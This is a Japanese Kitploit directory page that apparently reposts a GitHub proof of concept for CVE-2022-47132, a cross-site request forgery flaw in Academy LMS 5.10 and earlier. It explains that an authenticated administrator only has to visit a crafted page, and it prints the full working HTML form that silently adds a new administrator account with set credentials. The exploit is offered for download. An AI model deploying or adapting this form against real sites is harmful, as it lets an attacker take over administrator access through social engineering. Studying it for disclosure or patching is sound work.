Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-47132 — Academy LMS <= 5.10 の CSRF | Kitploit
ツール/GitHubGitHub/openxp-research/cve-2022-47132
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストソーシャルエンジニアリング
GitHubopenxp-research/cve-2022-47132

CVE-2022-47132

Academy LMS <= 5.10 の CSRF

リポジトリを見る
41年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-47132

Academy LMS <= 5.10 CSRF

説明

Academy LMSは、ユーザーがコースを作成し宣伝できるアプリケーションです。新しい管理ユーザーを追加する機能にはCSRFの脆弱性があり、ソーシャルエンジニアリングを利用してプラットフォームの管理者アクセスを取得することが可能です。

#概念実証 (POC) 概念実証の最初のステップは、管理ユーザーでプラットフォームに認証することです。

その後、脆弱性を悪用するコードを含むページにアクセスするだけで、新しい管理ユーザーがシステムに追加されていることを確認できます。

エクスプロイトで使用したコード:

root@kitploit:~
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://target.com/academy/admin/admins/add" method="POST">
      <input type="hidden" name="first&#95;name" value="csrf" />
      <input type="hidden" name="last&#95;name" value="vinix" />
      <input type="hidden" name="biography" value="&lt;p&gt;csrf&#32;poc&lt;&#47;p&gt;" />
      <input type="hidden" name="files" value="" />
      <input type="hidden" name="user&#95;image" value="" />
      <input type="hidden" name="email" value="username" />
      <input type="hidden" name="password" value="password" />
      <input type="hidden" name="facebook&#95;link" value="" />
      <input type="hidden" name="twitter&#95;link" value="" />
      <input type="hidden" name="linkedin&#95;link" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
ツールをダウンロード